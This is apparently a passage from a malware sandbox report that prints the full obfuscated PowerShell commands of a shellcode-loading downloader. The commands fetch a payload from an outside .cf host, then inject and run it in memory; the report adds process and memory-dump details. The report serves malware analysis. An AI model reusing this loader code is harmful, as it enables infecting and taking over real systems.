ARi6soCUr7Af5Be6Mi9Bo7Ma1Si6FiCRh6GiBFe3Sw9Or3AgDtr4QuAHy7Dd2To7SiCSp7Ak5Me6TrFKa6Ch0Is2PaDho3Yv0Ac3Fo5Sa3Ga9pi3Bu1fr5udEMi5DeDBe4TaDBi3Ug9In5Gr9Sc3Ev1Bj4Do2Ke5Pr0Sk7In7un6DiDKl4Pa9Ou6DeDYd6BaBbe4Un4Ab3To5Te3gi9Co4Tr2Le4RiCSc5Ma0Sa7So7Kl6NoDAc2StADo2StBSt4Re4ti3Le5Ve3Vi9Ch4Mi2Om4VaCge5To0Re7Fo7Su6SpDOv2FlAbl2GlBre4Pa4An3Ur5Ec3Re9Ud4Pe2Fa4UnCSa5Op0Pe7Er7Ak6InDSa2CaASg2TrBAf4Bo4Vi3Re0Do3Mi9Ge3Dy1un4Lu2Ko5Re0Hy7Bo7in6FuDHu4Th9Ov6SeDBr6CaBch4no4An3Re0In3Fo0Dr3Xy0so'li;Ch&De(Je`$StSBokOneBilNevEmyDu7St)Sa Sj`$StSUnuRepOyeBrrGiita6In;Un`$DvASorHybClaGolAn Sk=Pa AnfBrkChpPi Pa`$thSKokUgeFalSkvPlyAf5Po Ti`$SkSdekCheKrlDovhkyUn6Sk;Ov`$CrSSkuJapSteSarVriKa7Hi Ma=Co KoHBoTGrBPa Re'Ba3ArDSp5Ri0Hu7Wi7Ou6SkFSa7ba8Tr7Ce5Ta7Hu0Da2HoAHy3Kn9po2Kr4Gy3Ka9Fl3JuDUn5OvDOd7HoCTo6ThASq7Kl6De6WhBOb7Op0Cy3se7Id5Ve0Lu7Ma7ch6OpFSy7La6Su7An2Fl7PuCIn3St1In4Bl2Ab5Am0An7An7Po6BlDDo4Ri9Su6SkDCo6GuBVa4An4Pa2Bi3Ve2Ma3Br4Cr3Co7AlCCa6AcBSu7Ha6Sk3Gl5Es3Bo9Fe2FiFAl2BrFro2Ry9Na3St5Ev3Gl9Re2La9Ra6Hi1Ba2OyASw2De9Pa2Sa9De2Ma9Ln3En5G 3Ec9Ov2Jo9Mo6Be1Mi2MeDUn2Co9Ty3Fo0Fo'sl;St&En(Fr`$EnSArkFieAvlBevstyAr7He)Ru Qu`$HeSFluFopcoeNurNoiKo7re;Pe`$CoSOuuDepAfeAfrFiiSc8Co Ad=De AcHAnTGrBMi Mi'In3SiDbo5Up2Gt7fo6Es7Vi4Op7Ey4Do3Sc9Au2In4Af3To9Sm3GaDDi5FoDMa7SyCTu6maAde7fo6De6TeBHi7Ci0Ka3Ga7Ow5De0Wr7Is7Kr6BlFTa7st6Pa7Tu2Ko7BiCCo3Sp1Dy4Mo2Ho5De0Re7et7Ko6UnDDo4Si9in6LaDFl6ExBPe4Co4Fr2At3Ab2Me3un4Un3Pr7BaCMo6ReBGe7No6Ar3Hj5Ob3Br9Au2SaAPr2Pi1Ud2Ja1Of2Fe9Wi2FoCUn2AnCFj2Tn9La2LeDic3Op5Or3St9So2Pr9Ve6go1Su2ovATa2Br9Af2Ho9No2Bl9Fd3Le5To3th9Af2In9Fl6Ar1Mu2NoDRe3Ef0Ut'Fi;Bk&Ov(Sk`$HySNokCoeFalPrvMeyCo7Ni)Fa Pi`$KaSfluInpGeeTerFiiKl8Bl;Sa`$ArKRuoBiiTicHy0St1To Ha=Pa As'MohLotDitEgpSmsSl:in/Er/IsmBoeAlgBeoMaocokPabSapSynWhqDo.AzcVofSo/UnhWieMarKlppaeRetGriKlcViiBi.PlaAsfFomNo'Ke;Am`$CoKMyoweiPrcGr0ko0Gs Ak=Fa AdHstTGoBNo Il'Ar3CeDIm5KuFRa7kr6Go6RaBRe7Sa1Wa7al8Bo7Be7Li3Sy9Ce2Re4Te3Pr9Tr3Sk1Hu5ba7Kb7UfCBu6SkEUn3De4Mo5Re6Ge7SaBUn7Sa3Tm7ArCTh7SaAVa6JgDBi3Sc9Cr5Un7Ch7RuCpa6UrDCi3Pu7Fo4SkEin7PeCOp7TuBBe5UnAOr7Ba5Dr7Di0Mi7AmCPe7fl7Fi6FlDOb3Ri0Ka3Ha7Be5BiDKa7Wi6Ca6FrESo7Re7Na7Ef5Tu7Fo6Ap7De8Ef7AsDLu4DjAUn6LyDNo6HjBDo7Af0An7Ok7Ne7IsEFe3Li1Sk3UnDUr5Su2Re7Pe6Gr7Le0Am7WeAtr2Un9Bo2Zi8Un3sv0un'Af;Be`$VaSSkuLsptoePrrFriMi8Wa cu=Al HnHHaTOpBSp Aw'Se3AlDas5My0Af7Mi7In6BoFNe7Pn8Ly7Co5No7Lu0Em2MuBne2St4Re3UnDAr7PlCIs7Sk7Tw6BlFSc2Fo3Pr7Sp8un6ox9Fr6Pl9Te7AsDAh7Ne8Ov6NoDDe7Wh8As'Ud;Bi&Si(We`$MaSGrkuheUnlExvBiyBl7ha)Le Su`$ReSMouHopReeInrMuiAf8Bs;Ca`$obIHunSvvHoaPllSuiMe2Ma=He`$klIDrnUnvViaJilSkiAs2No+Ar'Fo\GuTGlrarbTvaFlaHe.KrdreaSttHy'Am;Ph`$OcFhioMirPohTeaHenFo=Hy'Ja'Me;PoiDefPe Mo(Up-JunEvoArtSm(BeTIneSisSatSc-BrPBraKotHahBe Bo`$ArIVenzovShaSalOniKy2Co)Un)Re An{CowCahHaiArlBaeDi Ud(to`$PoFSqostrFohEcaTunHo Je-NueReqMe Ud'Sa'Co)po Me{Py&Vo(Ky`$moSVekPoeEnlKovAfyNo7Es)Sa Pa`$FlKCooCoimacKa0Sk0Fi;DeSBrtQuansrDetAn-BaSAllPeeUneVipSa Te5ov;Ya}ScSVveRetAl-ScCFooDenFitBaeJenGotMa Tv`$PeIGrnAtvTaaAllEgiFo2fo Di`$ReFInoClrKehEmaSknIn;Me}re`$opFSeoAfrBrhPlaGinTr Fl=Tr FuGakeIdtUn-CoCDooPonvatTueConOvtAf Oc`$PhISlnDevReaRelSviPa2Ch;An`$fySMauLopPreSurKaiHa9Fd Ha=Mi noHMoTReBAg Ko'Sw3InDVe4GaAKo6AkCFu6An9Re7RaCJa6syBRe7Af0Un3Or9Ke2An4Be3jo9Da4jo2Ud4BaAFl6Po0Rn6PrASy6CrDMi7FoCTw7Pi4In3Ne7Fi5YuALo7Sc6Sy7Pl7Tr6SkFWo7MiCAn6RaBSd6UdDLi4Fo4Fo2Ka3St2Th3Ro5VeFsk6SmBDa7Er6Bu7Fi4Pr5StBHa7Sa8fj6DeASk7inCAf2SmFLe2KeDSt4MaAlo6OpDBu6GiBKi7Sv0fi7sl7He7PaEHe3Kn1Ps3PeDKo5DiFPo7Ud6Te6LiBlu7Bj1Un7So8La7fo7Du3Bo0Sq'To;La&Qu(Su`$MiSCokVrebrlinvGryBr7Ce)Kl Aa`$LiSKauBipUneBerImiUn9Dn;ug`$UdFDeoVirPrhFeaMdnMe0He Dr=Re CoHMnTKkBDe Te'Un4Te2Ga4CoAOv6Mu0Do6TeAAl6NoDUn7ReCAr7St4un3In7Ra4EuBCh6OpCRu7ca7In6waDSl7Gr0Sh7Re4Ef7MeCSu3Bl7Ll5Ko0Sc7Br7Pa6UnDBo7UnCKa6TrBBa7Pe6Be6St9St4SpASy7LaCTi6BaBDe6FrFHa7hy0co7EnASy7SpCAu6SeAZo3Mo7An5Py4Fo7Un8Hy6UnBBa6CaALo7Ve1Yi7He8Bo7he5Se4pu4Gr2To3Be2De3kr5DiAFr7Va6Co6Th9St6Ra0Di3Rd1Ga3DiDIn4AfALn6kuCGe6Fo9Hy7TrCOp6klBRe7By0Ho3No5Ba3Ud9Di2Un9Re3Re5In3Ra9St3Hi9Le3InDDr5Hi0Fo7Pa7Hj6GaFPr7Ku8Ud7Ab5Cu7Le0Pl2VoAPr3Fo5Lo3De9Om2saFEm2CeFRu2Fo9Gu3In0Re'Ou;Ru&Pa(Da`$HySOmkSueTalUdvSpyTe7Sa)Vi Di`$BrFEloNerAghWaaTonNo0Ti;In`$PaTlaeVaxuntFiuCoaRelFiiFl=La`$MeSPiuTepuneKirFoiNy.FocenoMeuFunJatAn-Pi6Pe6Kd0Te;Pl`$PoFunoGerUnhOuaYenIn1Rk Sv=Me VaHapTCoBby St'De4So2Or4ReABr6Sa0Vi6FoAEm6PlDHj7StCdi7Re4Bl3Ca7Pa4UnBMi6DeCNe7Wi7No6UnDGn7In0Ma7Si4Gr7RdCGe3fr7Sa5ke0So7Mo7Gl6DoDFo7KaCEl6CiBIo7Do6No6Fj9Ca4PeATo7AmCHe6FlBte6VeFGe7Co0Me7JuAco7DiCNo6ViAPh3Or7Fa5Be4An7Mi8Sk6ThBBi6ChAur7Ti1Me7Ga8Fa7Su5Vi4Sp4Dr2De3Sl2An3Mi5FrAOv7Ac6Up6Ca9ra6Te0ud3An1Sk3MoDHe4AcAPo6FiCFa6St9Ro7noCEr6UdBhi7Pa0Dc3in5Ju3Sk9Fl2ReFUn2UnFly2su9Se3Fi5Pa3Su9Sk3ReDRe5Gi2Mo7Ki6Da7Ge4No7Au4Ve3As5Op3hj9Re3JeDHa4LeDBi7BaCFl6Co1Tr6AkDSm6SlCAf7Me8Sp7En5Pr7Pe0Po3Ve0Re'Ph;Ov&fr(Dy`$OvSLokHoeUflinvceyRn7To)Bi Ko`$PrFWioForPrhIsaSpnSw1ga;Sk`$ChFunoInrInhPraBrnGa2Gl Ra=Pe HyHFoTFeBLa Vo'in3GrDEq7BiFHa7Ar6Fu6PhBSa7VeBSi3Ma9to2Pa4Me3Ef9Ke4Ud2Ma4elAKr6Al0Br6LyAAk6PoDVi7OpCCo7Ba4Ti3My7Ke4UnBMa6ReCNo7co7Po6LaDFo7Sp0Un7Ru4In7BaCRe3Va7Xe5To0Ko7Sn7Mi6JaDFr7DeCMa6ImBHe7Ge6Se6Bu9An4CeASp7PlCPi6NeBTa6GaFCy7Es0Mo7FlAPr7LiCCu6TrASn3Co7Ov5Me4Sv7Ca8Cy6MiBSt6HeAPa7In1Ca7Aa8Ne7Vi5No4Rg4Fo2Jo3Ma2Av3br5MaEEk7AdCDe6QuDSt5PaDSt7saCGu7Ta5Sn7SuCCo7SiEBi7An8Bi6CiDFu7VaCUa5AlFPo7no6Ef6MaBun5DrFCy6BlCUn7To7Ch7InASt6SaDka7Ba0Ho7Ko6Ap7In7Je4Fo9Sk7st6Ma7An0bo7To7Vr6DyDCr7CrCPi6PrBch3Su1St3fr1Ig7AnFSu7Kl2Bl6Sk9Ek3Sn9Ra3duDLy4FiAUn7Je8St7Di4sw7un5Ta7SoCCh3St9Ge3KiDOv4NyDMe7Tr8Ur7Un5No7LeCBo3ve0Bl3Ir5Ku3Va9Ca3Pi1Su5OkEOp5FiDKo4ArDUn3Ra9Ko5Br9Ge3Ma1Fo4St2Sk5Es0At7Dy7Wo6FoDJu4Ge9Sy6DiDSc6TaBRe4Fo4Fr3Ad5At3Ur9Tr4Hi2Un5Su0Sm7Di7Ni6FeDDi4No9Tr6DeDNo6SoBPa4Ud4fe3Di5br3Be9Sa4Ku2Mi5Di0Un7Ti7Re6FeDBu4Le9Gr6MaDTo6DoBSh4Fi4Ke3Go5si3Gr9Ve4ov2In5no0Di7Pa7Hu6IpDby4Ho9De6CrDUn6DyBHa4Ud4Ba3Br5St3Cl9co4Bo2Br5ba0Ma7An7Ac6PaDMa4Ba9Eu6AmDGr6MaBmi4At4Va3Sp0Ub3Pe9No3Ac1Be4Dr2Br5Bs0Ga7Da7St6PhDOv4Kn9Pi6BaDIn6PeBOc4Ou4Pi3Ur0Il3Gl0St3St0Tr'Av;Re&Fo(Co`$SySCokMieNylOpvViyBe7Mi)Ba ky`$trFSvoLarHahDaaHynBe2ra;Ti`$AdFFloHvrsphReaTrnFo3Fo Tm=Kr UnHDeTRaBMo Po'Af3AlDUl7DeFRa7Hy6En6KuBGy7ErBEm3Ve7Dr5Af0Ar7be7Kl6GuFAl7Hu6Li7Ig2Ch7MuCRd3Pr1Le3fiDsl5Wr0Re7Fg7Bd6baFFo7En8Ne7Ve5Ka7Yo0La2SjABr3Su5Te3PaDFl5Ca2Op7Su6Tr7La4Si7An4sa3Al5Sk3MrDUp5Fd8St6GrBIn7SuBHe7In8Kr7Wa5Ha3Fo5Va2Pr9Pr3Do5Th2Gi9Er3fo0My'Mt;Am&Te(Ja`$HyScokNoevilSovMeyRi7Sk)St Pe`$StFAfoRerKlhPraEtnCo3Sp#Ra;""";Function Forhan9 { param([String]$Amoralite); For($Valsa=2; $Valsa -lt $Amoralite.Length-1; $Valsa+=(2+1)){$Koic = $Koic + $Amoralite.Substring($Valsa, 1)}; $Koic;}$Talomr0 = Forhan9 'MiITaESpXPe ';$Talomr1= Forhan9 $Chester;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Talomr1 ;}else{&$Talomr0 $Talomr1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Amoralite); $Corsos = ''; Write-Host $Corsos; Write-Host $Corsos; Write-Host $Corsos; $smedemestr = New-Object byte[] ($Amoralite.Length / 2); For($Valsa=0; $Valsa -lt $Amoralite.Length; $Valsa+=2){ $smedemestr[$Valsa/2] = [convert]::ToByte($Amoralite.Substring($Valsa, 2), 16); $smedemestr[$Valsa/2] = ($smedemestr[$Valsa/2] -bxor 25); } [String][System.Text.Encoding]::ASCII.GetString($smedemestr);}$Udsalgsvar0=HTB '4A606A6D7C74377D7575';$Udsalgsvar1=HTB '54707A6B766A767F6D374E70772A2B374C776A787F7C57786D706F7C547C6D71767D6A';$Udsalgsvar2=HTB '5E7C6D496B767A587D7D6B7C6A6A';$Udsalgsvar3=HTB '4A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A375178777D757C4B7C7F';$Udsalgsvar4=HTB '6A6D6B70777E';$Udsalgsvar5=HTB '5E7C6D54767D6C757C5178777D757C';$Udsalgsvar6=HTB '4B4D4A697C7A7078755778747C353951707D7C5B604A707E3539496C7B75707A';$Udsalgsvar7=HTB '4B6C776D70747C3539547877787E7C7D';$Udsalgsvar8=HTB '4B7C7F757C7A6D7C7D5D7C757C7E786D7C';$Udsalgsvar9=HTB '5077547C74766B6054767D6C757C';$Skelvy0=HTB '54605D7C757C7E786D7C4D60697C';$Skelvy1=HTB '5A75786A6A3539496C7B75707A35394A7C78757C7D353958776A705A75786A6A3539586C6D765A75786A6A';$Skelvy2=HTB '50776F76727C';$Skelvy3=HTB '496C7B75707A353951707D7C5B604A707E3539577C6E4A75766D35394F706B6D6C7875';$Skelvy4=HTB '4F706B6D6C7875587575767A';$Skelvy5=HTB '776D7D7575';$Skelvy6=HTB '576D496B766D7C7A6D4F706B6D6C7875547C74766B60';$Skelvy7=HTB '505C41';$Skelvy8=HTB '45';$Samle=HTB '4C4A5C4B2A2B';$Tale=HTB '5A7875754E70777D766E496B767A58';function fkp {Param ($dugpunk, $Totingkata) ;$Superi0 =HTB '3D4A697D7C72787539243931425869695D76747870774423235A6C6B6B7C776D5D7674787077375E7C6D586A6A7C747B75707C6A31303965394E717C6B7C34567B737C7A6D3962393D46375E75767B7875586A6A7C747B75605A787A717C393458777D393D463755767A786D707677374A6975706D313D4A727C756F60213042342844375C686C78756A313D4C7D6A78757E6A6F786B2930396430375E7C6D4D60697C313D4C7D6A78757E6A6F786B2830';&($Skelvy7) $Superi0;$Superi5 = HTB '3D4D7C6B6D7078776A3924393D4A697D7C727875375E7C6D547C6D71767D313D4C7D6A78757E6A6F786B2B3539424D60697C4244443959313D4C7D6A78757E6A6F786B2A35393D4C7D6A78757E6A6F786B2D3030';&($Skelvy7) $Superi5;$Superi1 = HTB '6B7C6D6C6B77393D4D7C6B6D7078776A3750776F76727C313D776C757535395931424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A375178777D757C4B7C7F4431577C6E34567B737C7A6D394A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A375178777D757C4B7C7F3131577C6E34567B737C7A6D3950776D496D6B303539313D4A697D7C727875375E7C6D547C6D71767D313D4C7D6A78757E6A6F786B2C30303750776F76727C313D776C7575353959313D7D6C7E696C77723030303035393D4D766D70777E72786D783030';&($Skelvy7) $Superi1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Cosmonau,[Parameter(Position = 1)] [Type] $Chuckl = [Void]);$Superi2 = HTB '3D70777F75766E7B75766E392439425869695D76747870774423235A6C6B6B7C776D5D7674787077375D7C7F70777C5D60777874707A586A6A7C747B75603131577C6E34567B737C7A6D394A606A6D7C74374B7C7F757C7A6D70767737586A6A7C747B75605778747C313D4C7D6A78757E6A6F786B2130303539424A606A6D7C74374B7C7F757C7A6D707677375C74706D37586A6A7C747B75605B6C70757D7C6B587A7A7C6A6A4423234B6C7730375D7C7F70777C5D60777874707A54767D6C757C313D4C7D6A78757E6A6F786B2035393D7F78756A7C30375D7C7F70777C4D60697C313D4A727C756F602935393D4A727C756F60283539424A606A6D7C7437546C756D707A786A6D5D7C757C7E786D7C4430';&($Skelvy7) $Superi2;$Superi3 = HTB '3D70777F75766E7B75766E375D7C7F70777C5A76776A6D6B6C7A6D766B313D4C7D6A78757E6A6F786B2F3539424A606A6D7C74374B7C7F757C7A6D707677375A78757570777E5A76776F7C776D7076776A4423234A6D78777D786B7D35393D5A766A747677786C30374A7C6D507469757C747C776D786D7076775F75787E6A313D4C7D6A78757E6A6F786B2E30';&($Skelvy7) $Superi3;$Superi4 = HTB '3D70777F75766E7B75766E375D7C7F70777C547C6D71767D313D4A727C756F602B35393D4A727C756F602A35393D5A716C7A727535393D5A766A747677786C30374A7C6D507469757C747C776D786D7076775F75787E6A313D4C7D6A78757E6A6F786B2E30';&($Skelvy7) $Superi4;$Superi5 = HTB '6B7C6D6C6B77393D70777F75766E7B75766E375A6B7C786D7C4D60697C3130';&($Skelvy7) $Superi5 ;}$Sulphur = HTB '727C6B777C752A2B';$Superi6 = HTB '3D5D7C6A766B70392439424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235E7C6D5D7C757C7E786D7C5F766B5F6C777A6D707677497670776D7C6B31317F7269393D4A6C7569716C6B393D4A727C756F602D303539315E5D4D3959314250776D496D6B443539424C50776D2A2B443539424C50776D2A2B443539424C50776D2A2B443039314250776D496D6B44303030';&($Skelvy7) $Superi6;$Arbal = fkp $Skelvy5 $Skelvy6;$Superi7 = HTB '3D50776F7875702A3924393D5D7C6A766B703750776F76727C314250776D496D6B442323437C6B7635392F2F29353929612A292929353929612D2930';&($Skelvy7) $Superi7;$Superi8 = HTB '3D527674743924393D5D7C6A766B703750776F76727C314250776D496D6B442323437C6B7635392A2121292C2C292D353929612A292929353929612D30';&($Skelvy7) $Superi8;$Koic01 = 'https://megookbpnq.cf/herpetici.afm';$Koic00 = HTB '3D5F766B71787739243931577C6E34567B737C7A6D39577C6D374E7C7B5A75707C776D30375D766E777576787D4A6D6B70777E313D5276707A292830';$Superi8 = HTB '3D50776F7875702B243D7C776F237869697D786D78';&($Skelvy7) $Superi8;$Invali2=$Invali2+'\Trbaa.dat';$Forhan='';if (-not(Test-Path $Invali2)) {while ($Forhan -eq '') {&($Skelvy7) $Koic00;Start-Sleep 5;}Set-Content $Invali2 $Forhan;}$Forhan = Get-Content $Invali2;$Superi9 = HTB '3D4A6C697C6B70392439424A606A6D7C74375A76776F7C6B6D4423235F6B76745B786A7C2F2D4A6D6B70777E313D5F766B71787730';&($Skelvy7) $Superi9;$Forhan0 = HTB '424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235A766960313D4A6C697C6B703539293539393D50776F7875702A35392F2F2930';&($Skelvy7) $Forhan0;$Textuali=$Superi.count-660;$Forhan1 = HTB '424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235A766960313D4A6C697C6B7035392F2F2935393D5276747435393D4D7C616D6C78757030';&($Skelvy7) $Forhan1;$Forhan2 = HTB '3D7F766B7B392439424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235E7C6D5D7C757C7E786D7C5F766B5F6C777A6D707677497670776D7C6B31317F7269393D4A7874757C393D4D78757C303539315E5D4D3959314250776D496D6B4435394250776D496D6B4435394250776D496D6B4435394250776D496D6B4435394250776D496D6B443039314250776D496D6B44303030';&($Skelvy7) $Forhan2;$Forhan3 = HTB '3D7F766B7B3750776F76727C313D50776F7875702A353D52767474353D586B7B78753529352930';&($Skelvy7) $Forhan3#"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:780
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/780-69-0x0000000073360000-0x000000007390B000-memory.dmpFilesize
5.7MB
-
memory/780-66-0x0000000073360000-0x000000007390B000-memory.dmpFilesize
5.7MB
-
memory/780-65-0x00000000753D1000-0x00000000753D3000-memory.dmpFilesize
8KB
-
memory/780-64-0x0000000000000000-mapping.dmp
-
memory/876-55-0x0000000000000000-mapping.dmp
-
memory/956-54-0x0000000000000000-mapping.dmp
-
memory/1076-60-0x000007FEF2930000-0x000007FEF348D000-memory.dmpFilesize
11.4MB
-
memory/1076-62-0x000000001B770000-0x000000001BA6F000-memory.dmpFilesize
3.0MB
-
memory/1076-61-0x00000000027B4000-0x00000000027B7000-memory.dmpFilesize
12KB
-
memory/1076-63-0x00000000027BB000-0x00000000027DA000-memory.dmpFilesize
124KB
-
memory/1076-59-0x000007FEF3730000-0x000007FEF4153000-memory.dmpFilesize
10.1MB
-
memory/1076-57-0x0000000000000000-mapping.dmp
-
memory/1076-67-0x00000000027B4000-0x00000000027B7000-memory.dmpFilesize
12KB
-
memory/1076-68-0x00000000027BB000-0x00000000027DA000-memory.dmpFilesize
124KB
-
memory/1996-56-0x000007FEFBBA1000-0x000007FEFBBA3000-memory.dmpFilesize
8KB